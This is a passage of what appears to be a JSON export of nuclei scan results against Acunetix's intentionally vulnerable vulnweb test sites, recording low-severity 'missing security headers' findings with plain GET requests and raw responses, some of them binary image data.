3�.\u0006���趹\u001f����FYl=���R�a�\f�B���YO�\u001f���C_:i��ײ��FY,=���R�a�\f�b���YO�\u0012�\u0007�e@Gq�Յ�&G���[\u000fhg�\u0014�X{C?\u0018��\u0019t� \u00118j�\u0012�\u0011�jSa;2G�\u0013F�,=���Rɇ�C?\u0018��#��`8�ZOe$yԨ�RwfO2h�%��3��Yp�hg�\u00147�}6��\u0010\f(��\u001esK��De\u0003�Q�\u0016#k�~1K�^���(oE��~��0����OvSL\u00188V�\bO�@��{K_\u0018�E��埌Q�1�NH�\u001c��� M������\u0013���;W$�ӷ�\r�\rZ�$;m�c(\n�T\u0001�I�4��~��Ņ�׽z\u0016�\u0014 \u0001�E�$�xk\u001bl8p�ϨR�\b�\u001d-Ŵ;���L!��V\u0016�\u0002�+�\u0003��\u001f|�u��b\bk�.:�\b�LƁZ�Ѓ�X���h/���.B�eH))!! H�!;lg�0▪E�}P}�(���)#(%[\u001d���YWQ�J�.���]��b/\u0007\u0002\u001cs�@P$����M����\u0012�SM�^\u000e-A\t܉�G\u0018�\u0016��o\u001crԼ�E�u�+*���F�.���V��˶�\u001a��-#+�7\u0004J\u0013�a\u001a� ��\u0002$M\tu\u0019���;e��Yx�(�6\u001c�!\u0004�Y���\u000e����b��\fN�\u0019E�n��#�m��9���H1�\u001f��ڠ��Ɉ���[j\u0015�!�0��\u0003\u0007�&"\u000e�j)�8��Iq�f��}��\b\n'|����Y+7r�J\u0017�7�I�U~�����Gajȩ�>`x��Ķ��8��6�]:P�FE�+*Q�\u0012F�\u00065\u0010�Tq�C\u0007yƔ��\u0010��\u0011�=��\u0019'�y�v�l�p�_\fqn+�]����$q\u001eQ�?\u001aYW����\u000fd}\u001a��q7\u0015��۔��\u0004��\t\u0002\u000f\u00025\u001ae\u001cF���8�$�\u0016��\\C\u0004f��2�\b�\u001a�5\u0011���\u0002��î[�KL�խh%N\u0013�h�\u0004�\u001c\u0001o:�d[�]�Y\\��бd�W(\u0005��\u0003S�\t�\u0013��Ũ�{�\u0013�<X4��1\u000b��,ߘ\u0004���\u0012��<9H��4�X��\r�p]Y�\u0003�\u0019"7�Q�\u0015�/�ww�u,\\:۩�\b�*ˤ�7\u0018���o�����`k�\u001a]��mEJ%Dd��"gS���\u0013�=\n�he��1%J/\u0016\u000bn�Q�۾�\u001fq�<م$�j�=.�R�/�S�hO\u000e�\u0012�$��������Ze'e\r9@�֯�ݦ'���\u0012P\u0014�\u001c���se��\u0003A��jZ�����-4�Y\u001bk����r�TBGorv\u001bӏK���}I\u0003i\\��7��0���T�\u00044�k�\u001d�$��;N\u0013vm\u0014���ܘ�Gw\u0012|\u0006��������\u0005�\n�.�p�t����r�皤\u001d0�*���\u001d�SC\u0016WV�o�9�|��C���J���C"4���\u0013R�v�.��\u0019�\u001bG��VHL\u0002\u0006i�\u0006����ޒ]B\nV�\u0019i�l�β�F\u0012\u001ce���Ќ�@\u000e�>\u0014��\u0016�YԄ�ⳒN�����x�\u0016�u���\u0010BB�\u001c�T���\u001c7�4.����x�(�V\bB3��6�غ��/�\u0012îu��$�W]@�����\u0016�a͵�4\u0014\u001a�\u001ey�\n@�'��\f�\u0004F��\u000e\u001a�{���ܦ�(��Fl���*ݻ*��T\u0014����Q�*\u0007�\u0006i�"���\u0010�t���!qw��ݷ�>�\t�cI\u0011��Y�[\u00168��-\u0015t�>��P�ҳ\u0015&`(�\u001a��üP-���1��H\u001dA=��ӕ\u0016٭�p�mՙ�tR\u0002���\u000f�w���8G)\u0007�K�]N4�Wn�\u0010�\u0003,�\fs\u0007]�3"^HPK�F�H\u001a�p�oDNa]K�2��HP\b��y�}��U�,57=Z�n��1\u0019c�����U�\u0016\u0001c\n͉�\u0016���U��\b��Jں��j���\u000e��B\u000bn%3\u0005�F�{ֵ�\u001bl\bB\u0019lI��))H��\u0003a�\u001d��S\\�n\u001dYm$+)�刐 �\f\r�����u'��0��Ҝ�i!JP�,L�\u0001\u001aL��\u001fJ�|�,p�KRB^t\u0005����h;�j�Ͳ�ԧs��H�V��m�\u0001�����C8�,�!���;�bg:�\u0004�5�\u0018\u001a��.�\u001e����[�\u0002oqE�\u0013n��R\u001a �\u0002x}k�z\u0011�3��\nn��9n\u0002V�$���Q׈\u0002I܃�y& �\\�T��F�L@\u001e\u0002���^\u001e�k�u���D\u0018��+�^��\u0004�\u0019\u0013�Y�\u0015��\u001b[莩�ħi�\u000f�:���c�<\u000b�6\u0014d�*$����L��]�\tm����\u0002\u000e�R��b���)& ������q�@��]���U��2r�)L�����,=�ш\u000b�”�܅(\t��\u0015�\u0004�?:1w\u0017��ZP��%\t�`(���D��.� �q��!��Q���Y�w+��\u0012�,)X�a`6�\u0018��*x�1\u0014K�Z��\u0007�z�,��HS\u0004�)\u0006\f�G\u0001 ���\u0018��ıD���*ԭZ7��\u0015��\\=\t’�R-���\u0010]�h��]~T��e(Ő\u0005�p���\u0004\u0003�\u001a�*+2kZ�\u0015ZD\u0014\b�YB9V�p\u0002L�Ԥ��IWn��\u0016��m&@��L�37\u001a��RX)YЂ)�� \tN\u001eop�/�R��\u000eGF�DhF�6:�M2ѻ�[��\u0001SZ\u0012�Ǻ�C�Akv��Q\r�\u0018:�H��D*]�U�H\n�II\u0013\u001bH\u001e\u0015�nQn-`(����G\u0010�\u0013�v��\u000e����5a\u0017�D����u���x�\by���\u0002#��\u001bT��J�z�\u0007Q��c_�Y%L(%o\u0010hu�7\tZb\u0012�"u��H�Tn\\�ܽVT\u0015+�\n�\u0012\u000e��X�踸jє�\u001a�~�뫺ZD���c0\u0004\u001f�W�d.��Iq3m`��c9\u0019\u001bo��Y>C���-�%���d����'X'�O��[��n�ajNl��\u0001������f�:V��ʄ'a�km$�\u001e��S\u0002�y�\u0015\u0003A�_€a�.�\u0001�!#���J�I�N�����g �Guk�q`\u0010��-�/1\n'y��/4�25\u0006x�\u0014��\u0010u�\u001ba�`%:�G\u00045�3j��H8��\u0004��PU�'¶1|=~��[Z\u0003-���:�y���\u001d\u0012e-\u0002�$�� \rD�υ[�R�c\r-)!\u000f9�W08\b�|�\u0014�7VȄX&(ղ�s\u0002\b%*�\u001fޝ�\\e\u0018��Wn���O>:���&�\n\u001c$fȭ��@�\u0002� (F�)�˽Ir\u0017$�٣qg\n��\u0019�\u001b����T�\f\u001f�\u001c�6�����(��'.i�׉�����ʙ�;q��S���FRM�J�R\t�\u001b�\u001fÊ�*���0EJ���� \u000eU�\u0002�\tY�䟥[w�\n�Ӑ�P��W\t5��6�\u0001eAGI\u001a\u0011�UD)eq$�w�|�VR\u0012�\b�t"L�Ƅ��\t�ڛ��L�s\u001e4�|��\u0001\u0001�\u0001���J�2�G7*����&\u000e�\nT��<\u0012����vaCj����*p��\u001b�#�TEڒ������M\u000f=�B�'bi�)?\u00029�y-�.V���\u0004�́���]�:�\u0015��4����rgi֚�\u001f��U��:xҚ\u0007�\u0012�p�У�S�\rj�M���\u0006�x\u0011�R�O�uQ<�Y�\u0014��J�O}3�Q�懲\u0015�ҖH\u0003��L٥e!*�xD�a\t#:\t���J�\u0010��\u001c��&*�)"�(ˆ\u0014aL\u000b\u001bR��\u001a�\u0010A(<x��P�J�Uqrd�5#6�'�Z\r::��\u0010L�sN���"��w��²z�m*�4�7&\u0016gp5=��R��*A�P����h��ي�ՙ�*%i@$�`i�k!�!S\u001a�|�ҥ\\�\u000e��$\u0014�\u0002t�j\u00022�@m R�W�1f̤�����\u0017�\u0012��p��J�\bԵ(�cz������iR�PV�\f�y%m���\u001fqS%\u00031\u001e?*T�>E\u0011\u00039\u0011�>�j�\t�>�R�Q\u0001�N�\u0014�z�@ޕ*Ҹ2ˑ�\u00026\u001bTKBH:R�Q�\u001c[I))\u0012\u0007q�LI\u0001\u000f\u00109q�J���j��4���P��\\P\u0011=��Uf���", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 940, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "permissions-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 Edg/91.0.864.59' 'http://testphp.vulnweb.com/wvstests/pmwiki_2_1_19'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/wvstests/pmwiki_2_1_19", + "discovered_date": "2024-11-13T02:42:31.303Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /wvstests/pmwiki_2_1_19 HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 Edg/91.0.864.59\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html\r\nDate: Wed, 13 Nov 2024 02:42:25 GMT\r\nServer: nginx/1.19.0\r\n\r\n<html>\r\n<head><title>Index of /wvstests/pmwiki_2_1_19/</title></head>\r\n<body>\r\n<h1>Index of /wvstests/pmwiki_2_1_19/</h1><hr><pre><a href="../">../</a>\r\n<a href="scripts/">scripts/</a> 08-Apr-2013 08:44 -\r\n</pre><hr></body>\r\n</html>\r\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 941, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "x-frame-options", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Edg/105.0.1343.50' 'http://testphp.vulnweb.com/pictures/5.jpg.tn'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/pictures/5.jpg.tn", + "discovered_date": "2024-11-13T02:42:31.583Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /pictures/5.jpg.tn HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Edg/105.0.1343.50\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nContent-Length: 4428\r\nAccept-Ranges: bytes\r\nContent-Type: application/octet-stream\r\nDate: Wed, 13 Nov 2024 02:42:12 GMT\r\nEtag: "4dca64a1-114c"\r\nLast-Modified: Wed, 11 May 2011 10:27:45 GMT\r\nServer: nginx/1.19.0\r\n\r\n����\u0010JFIF\u0001\u0001\u0001\u0001��C\u0006\u0004\u0005\u0006\u0005\u0004\u0006\u0006\u0005\u0006\u0007\u0007\u0006\b\n\u0010\n\n\t\t\n\u0014\u000e\u000f\f\u0010\u0017\u0014\u0018\u0018\u0017\u0014\u0016\u0016\u001a\u001d%\u001f\u001a\u001b#\u001c\u0016\u0016 , #&')*)\u0019\u001f-0-(0%()(��C\u0001\u0007\u0007\u0007\n\b\n\u0013\n\n\u0013(\u001a\u0016\u001a((((((((((((((((((((((((((((((((((((((((((((((((((��\u0011\bd�\u0003\u0001"\u0002\u0011\u0001\u0003\u0011\u0001��\u001b\u0002\u0003\u0001\u0001\u0001\u0004\u0002\u0003\u0005\u0001\u0007\u0006��2\u0010\u0002\u0002\u0001\u0003\u0003\u0002\u0004\u0006\u0002\u0002\u0003\u0001\u0001\u0002\u0003\u0011\u0004\u0012!1AQ\u0013"\u00052aq\u0006\u0014#B����R�\u0015b�r��\u001b\u0001\u0001\u0005\u0001\u0001\u0002\u0001\u0003\u0004\u0005\u0006\u0007��/\u0011\u0001\u0003\u0002\u0005\u0001\u0007\u0004\u0002\u0003\u0001\u0002\u0003\u0004\u0011\u0005\u0012!1A\u0013Qaq����"���\u0006�\u00142���\f\u0003\u0001\u0002\u0011\u0003\u0011?�\u001a�d�������0�V\u0015��gQ�%XmƲ ��Tg6�ru�Ʋ0��G\n>2y��d�EV\u0019m}3�1��<*������qY\u0016`��d��6�k"�w��r�{0�qY.��\u0019*>3��F\u001e\u0013u�\f�\u000f\u0018�Du2i��h.�H�2��\t\u0019^Ӗ�.z*�J��\u001d\u0014\u0002�@2ء\u0012\t\u0018=�+\u0012T\u00176.�-��EcZA\u0012,�*�!\t\u0003o\u0007�:�<��x����Fh�u�'\u000b\b6\u0001&�\u0003��\f4\r�|�Ӽ�@\u0005��>[$LL\r2Ѡ���\u0019ƈ���Ӆ�����\u0007�=N��2<t�R�*Xr�r�\u001d8?+\u000b�#2H��1�\u0012D�ሠ\u0006�6�9\u0006�o�}�\u0001`ֻV�V\f���./c�Y�p��4�z\u000fH�\u0011V\n��\u001b��u�\u0012)X\u0005�n��:��aU\u0004��\r?�?�\b�\rm^�����\r}��\nF�\u0019��I\u0004J�\u0015:�\u0003�d�?��SϬ��$!�j\u0004�6�_�_\u001fk�\r\\��UM4�(\b\u0016\u0017$����t���x$\u000e\u0019\u0003q�#ʚ�>�+\u001a9�3�;V��8��c��Lz\u0007Ӽ�6�53�\u0012�eZ8\t4\u0018���J�\u001c\u000e��4�@��M��1���\u0005EF�r9*H�(qV\u000b���,�q��������m��%� �\u0006�B�p�\u0004�1b\u0010��j9$�}?���,[M���\u0001\u001b�kQ\u001dױ�`�+l�iqf����Ww�%+\u0018���]���$�p/8󿡣�@���r�E�k\u001d�6<�\b��c\u0006�IYX���/�q��R:\u0018�5\n^%e\u001eǐ�\u0007��U}��<��&��R��)\u0012H��\r���<�9�&�W�I6�?a?9���!�uR��51>�\u000e��\u001e\u001dDl-8;ā����6\u000f?B\u001b\\n�jꧠ��q~c��i����$SH�\u00132L�@�W�*ё�f�z��+��m9���\u0014�b*��V�Z4o���V��\u001a�ٷJʭ�H�����\u000ex��\u001b�(��%�;+��U0��XKo���hi�\r4~��~`��(b»�z׎����h@`���6�eGݶ��V\b�\u0005�ʦ���6���\r�;�\u001d\t�@��s�C\u0014r�R3\u001f��2\t\u0014i���TG�:\u0010\b���B�'�(\\e�p� |�R�.�\u000b���t\u0005��\u0002C��7\u0016���"����8�\u0007M�E$,�&\u0014\u000e�<�\u0007��\u001d\t�4�JҼ�~��9jC,d�ف\u001c\u0001�;�]�\u0007kZ߇��P��\u0015�2�(k��/�\u0011�M���:�d�N�����林ԝ�CpX��8�/�\u0016<�\u001c�8������'�kkb�u\u0011G/�^O�T\u0014x�}Gׯ�Š�sJ\u0015�e\n�w�ZW�\r\u001e/�W{]{\u0005��UQ22]a}{�>]OK��F�*D&�7;��{��Q\u0010���C�P�G����v(\u0001��O8�ZWi��\u0001i#4֥A�ш��sW]��\u0013$�4N\u001fiV�n�\u0006\u001c��\u0010~��9#\u0001:\u0015F�H\u0003���\u0001��S���"��A%��x��\u000fw5���\u0003*�\u0003\u0016�IY�HY\u001byqE@��5��o�۾��\u0012(U_dP�V4-)$�J,�l�"��ךˌ\r,pƞ�s���\u00197B��-�C�m��\u000f\u0016\r��B�f�\u001b\u0014����\u001fE�ڄ����18��\u001d��UoU��"�оؤӳ0\u0006�p3cT����#�5\r$6x�\u0010z�&ʶ�Th\u001a#�V-\u0002j\u0002\u0015\u0005\t��\t\u0014M_#�\u001b�\u0005\u001e/+�óJ���F���%�K��R�F�*�2����~��hi�%d�4�Ez�\u0015BG�\u0006�5`t�\u0003�������*��I�\u000eù�9<e��@����xԊfQVv�@�]��xÂ��zI��c�\u0005u�A#*:�B\u0003Q�M\u0003G�DgSB���ޑ3����Z��\u0001�y\u0001�t錬\n�$��]\u0001\u0004�ˎ�x�\t��Y�\u0002��:d\u001a�A\u0010�f�\u001c�-�{�-tv݁���V2�.W5Y�\u0018\u000bKέ��,yt蓕�U��fP�[o�]\u0001aۥu'\u0011\u0012)��+\u0017ݹ\u001c8*\b,\b�{w\u0007���I�]\u0013Țy�\u0012eYD�C!dV\u001e�\t5�A�\u0002��\u000eT�B}k��1�2�K\u001f\u0014��.k\\30��F.ڗ\bݭ�}�j�,o�[\u0013\u001b\u001c�\u001a�<Qʂ�ov]�`�n��\u0012mH��^�古T�|r��]�\u0002O\u0015�u'�\u001c���������$�\u00166�rgK��]��\u0019����:�\n_;��}�\r�j\u0010�����sn�N�]��뷋��L�L�E\u0014Q�Wolq�v\u0002�/h#ڶ;��rT\u001b����1X�{I{@��d��d�\u000fóG�D�j�(Ν��\tm\u001f1a@��r7X\r^E�@�t�!�U�+\u001bI��GP\u0019�\nwn��\u0010\u000f\u001b�b\u000fZ 篡�ӟO<���bd(����i�n��o\u001b���q��������7z\u0016#�U���������fe^\u001a���.kYrQ�4E�5����d��\u001c\u0002NԠ�\u0010��$w��O�0$\u0012��x���L���\u0004��.�lR�c�H5���Ŭ1��Y\n�\u0006�\\\u0005\u0003�_<�n�՞2��'u�84s�B\u001a��i��J\u0002�*�GI1�a\u0011�6�T��\u000b*�\u000bW�\u001f�~���P`��P��ۻ1w��fbI�9���h��\b����\u0015QI&�\u0001G=z<��\u0015_\u0012�i\u0001/c@��ZS�H��b\u0012��\u0018�K�`R9w,G\u0002\r_S���K�ַZ��~!9�4��5Dc܇jPF\u001cݐ�l}�{4���锉��*fm�����׻h\u0015f��\u0019{z!��\u001d8W`_���\u0005�W`C��o�=M�\fG\u000fu`\u0001���\u0010\u0019%<��fk����I/�4_\u0001�/�f_�,(�HǫРM�=\u0005�?z�mY;����\t\nzu��篃]\u000em|GYꬔ�B�%MY՟�\u0017]<�kkUQ\u0015���V76�D�������\f�������/�p�M\u0010!����o��J�[�;\u001b\u0004_RB�#\u0005��@�� �=8$_�p�Y\nV�2\u0016�%��\u0007��yѨgӘ\r\u0018�=7W��\u001f�\u0016�|\u001b=1��b�+�<�� <O�j�\u0003V玎�+~�Q����x���\u001d��?\u0010O,_��'��C\u001bN�b�<�n\n\u0018��n��\u0018�\u0015d_��N\u0011��;�\fȼ���͑��{4�tq�:HF�I57"�\f�\u0013a�F��������B��'$���\u0019cy^��8���\u001e6�^E�\u000e_����ru��La��\u0019�6�\r\u0005t$\u0017b�\u0016�kn9�U���?�U�m�\u0015��O5|�z#��;.��Ԛ�i*���v�b\u0005� ]mcԟq��\f�l��\t%E�\u001c�'?��O\u0007�'��)�њ8�\u000b�u\u0006�Y���nQ�ߥ�9��\u0002\r\n��W\u0015�����i�u�qFY�)U�n��\u0002��ӽ\u000b$�,~f#(t��87���G>*�}z��/{�@5S��z\u0016�\n�!f�H�\u0019\u0002m\f�6��n�\u001b`\u0005�NVȻ\u0013�9\u0004��]����7W�,�,��_zG\fP@�!�\u0004h��\n\u0005\u0001}�;�p�,��d��Z�O\u0003�j<�t�\b�A2\u001a�\u0013|u�+��*�S�Ԑ\u0011�3���������h��?A�V2\t�,�\u0015��*���A�Zy����d'k*�-�M����n�\u0007��\u0016E�S\u0011C\u000b�%���_�}�50j\u0016#�i�ƀ���W�U��j�y�1\u000b\u0006��\u0013��$��2Q�uA��P��I�2i=�\u001b��\rq�h�P+�\t��$��\r$���x�`��\u0001\u0007�\u0004U����p\u0004E�Ԅt8�Dl!����\u000e��\u0016���%�j&�\u001eÓҸ\u001c�\u0005��uh�eT\by��ہ\u0016v��]��;���k�^��/#6�����l�\b\u0015`\u0002�x\u0007�8�{<�\u0007\u0006�\u0015���ZD�\u0002Á�Z�Yv�3X�x�]�\u000b9:v����\u001c\u001fo��*�t������l'���\u0015d�)�XC����A?�[�;\u001e0̆�\u0006���{$�:\u0011~E�\u001eˌE_�:�cd�6����@\t x\u001f�ZX�0���r\b�\u000b&�X5q��W��\u00114!Ķ(\u000b�P�\u0015�!`�\fQP��\u0016]���S@(n�\u0015<�?sB�h����=\u001e,�&�63��׿mO�ȅ\t I�C\u001c��\u0010�ɽ�ŀ꠆�u\u0004\u001a�#��|�`j��T�\u0014h�1=�\u0004W ݃�&󷦱�fU\u0014\u000b��#�O'��F�>y�\u0013�1���|�&U\u0004�`,{�\n8�g�$���N�!sjň\u00062�]\u001b����Uu�s����s�`t%�T�\u001bzr���\u001bd$h�����&�鿱Q��Z2��J�E3�.��#���\njd3\u0015�L��R�E��d�\u001cw<p:_$N҅�Nc\u0006��\nO���T�5\b�G#iF�\u0011?.����@������Y�y\u001c�̞h*gf\u0014�3-�N��#B;��z���b\u00074t�E�P�ʦ3 ��v��H\u0004\u000b�\u0016y=,���\u0014�"x�\u0002�����J�\u0005J�<�$�\u0004U^Dح�כ\u001dc�c\u001aK��K_���9^\u0018�W�aZ�]��Զ’\u0002�T�\u0006(y��\u000f���9c\u001c<�\u0014���,�t��Y��_o\u0019\u0016������7��b�T��cma��q�Y�^\u0017��N#V+�q�.�C"���L\b�M��:\u0002~�k�|�}�xA�*���8����Y\u00022�*�\u0004\n6��\u0001�\u0003���\u000e+�I\u001e�T\u0004\u0006�*�t�/8Xb��\f�akr��V4��$���Cvp��.W�\b\u001a�\r��5F\u0016�7F�o[�\u001d�#��w}1��n\u0010MHٛ���k��L�,Z��\u0005\u0014Esȫ\u0007�:x�k�U��h�~ߘ���^*��\u0019��8X���|x4L:�Ga����]Z�\u001b,jC9�!�\u001e\b����ŞVaL���Qg9~p\f��+���\u0019�\u001a��l�p�\u0018�Q�\f1'F\u0018a�$g\u0018�\u0018c\u0014�u\u001d��o�\u0018bR���\u0018`�F\u0018a�$a�\u0018�Fr�\u0018bF�a�\u0018(���", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 942, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 112, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "referrer-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/9.1.2 Safari/605.1.15' 'http://www.vulnweb.com'", + "type": "http", + "http_url": "http://www.vulnweb.com", + "discovered_date": "2024-11-13T02:42:31.833Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET / HTTP/1.1\r\nHost: www.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/9.1.2 Safari/605.1.15\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html\r\nDate: Wed, 13 Nov 2024 02:42:26 GMT\r\nEtag: W/"5f1fedf1-fb2"\r\nLast-Modified: Tue, 28 Jul 2020 09:20:49 GMT\r\nServer: nginx/1.19.0\r\n\r\n<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">\n<html xmlns="http://www.w3.org/1999/xhtml">\n<head>\n<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />\n<title>Acunetix Web Vulnerability Scanner - Test websites</title>\n<style type="text/css">\n<!--\n@import url("style.css");\n-->\n</style>\n</head>\n<body>\n\n\n<center>\n<br>\n\n<a href='https://www.acunetix.com/'><img src='acunetix-logo.png' border='0' alt="Acunetix website security"></a><br><br>\n<div>Vulnerable test websites for <a href='https://www.acunetix.com/vulnerability-scanner/'>Acunetix Web Vulnerability Scanner</a>.</div>\n\n<table id="one-column-emphasis" summary="Acunetix test websites" style="width:60%">\n <colgroup>\n \t<col>\n </colgroup>\n <thead>\n \t<tr style="font-size:14px">\n \t<th scope="col"><b>Name</b></th>\n <th scope="col"><b>URL</b></th>\n <th scope="col"><b>Technologies</b></th>\n\t\t\t<th scope="col"><b>Resources</b></th>\n </tr>\n </thead>\n <tbody>\n \t<tr style="font-size:14px">\n \t<td>SecurityTweets</td>\n <td><a href='http://testhtml5.vulnweb.com/'>http://testhtml5.vulnweb.com</a></td>\n <td>nginx, Python, Flask, CouchDB</td>\n\t\t\t<td><a href='https://www.acunetix.com/vulnerability-scanner/html5-website-security/'>Review</a> Acunetix HTML5 scanner or <a href='https://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/'>learn more</a> on the topic.</td>\n </tr>\n \t<tr style="font-size:14px">\n \t<td>Acuart</td>\n <td><a href='http://testphp.vulnweb.com/'>http://testphp.vulnweb.com</a></td>\n <td>Apache, PHP, MySQL</td>\n\t\t\t<td><a href='https://www.acunetix.com/vulnerability-scanner/php-security-scanner/'>Review</a> Acunetix PHP scanner or <a href='https://www.acunetix.com/blog/articles/prevent-sql-injection-vulnerabilities-in-php-applications/'>learn more</a> on the topic.</td>\n </tr>\n \t<tr style="font-size:14px">\n \t<td>Acuforum</td>\n <td><a href='http://testasp.vulnweb.com/'>http://testasp.vulnweb.com</a></td>\n <td>IIS, ASP, Microsoft SQL Server</td>\n\t\t\t<td><a href='https://www.acunetix.com/vulnerability-scanner/sql-injection/'>Review</a> Acunetix SQL scanner or <a href='https://www.acunetix.com/websitesecurity/sql-injection/'>learn more</a> on the topic.</td>\n </tr>\n \t<tr style="font-size:14px">\n \t<td>Acublog</td>\n <td><a href='http://testaspnet.vulnweb.com/'>http://testaspnet.vulnweb.com</a></td>\n <td>IIS, ASP.NET, Microsoft SQL Server</td>\n\t\t\t<td><a href='https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/'>Review</a> Acunetix network scanner or <a href='https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/'>learn more</a> on the topic.</td>\n </tr>\n\t\t<tr style="font-size:14px">\n \t<td>REST API</td>\n <td><a href='http://rest.vulnweb.com/'>http://rest.vulnweb.com/</a></td>\n <td>Apache, PHP, MySQL</td>\n\t\t\t<td><a href='https://www.acunetix.com/blog/articles/rest-api-security-testing-acunetix/'>Review</a> Acunetix scanner or <a href='https://www.acunetix.com/blog/articles/rest-api-security-testing-acunetix/'>learn more</a> on the topic.</td>\n </tr>\n </tbody>\n</table>\n\n<div style="background-color:lightgray;width:60%;text-align:center;font-size:14px">\n<p style="padding-left:140px;padding-right:140px"><b>Warning</b>: This site hosts intentionally vulnerable web applications. You can use these applications to understand how programming and configuration errors lead to security breaches. We created the site to help you test Acunetix but you may also use it for manual penetration testing or for educational purposes. It will help you learn about vulnerabilities such as SQL Injection, Cross-site Scripting (XSS), Cross-site Request Forgery (CSRF), and many more.</p>\n</div>\n</center>\n\n</body>\n</html>\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 943, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "clear-site-data", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:24.0) Gecko/20100101 Firefox/24.0' 'http://testphp.vulnweb.com/pictures/6.jpg.tn'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/pictures/6.jpg.tn", + "discovered_date": "2024-11-13T02:42:32.106Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /pictures/6.jpg.tn HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:24.0) Gecko/20100101 Firefox/24.0\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: 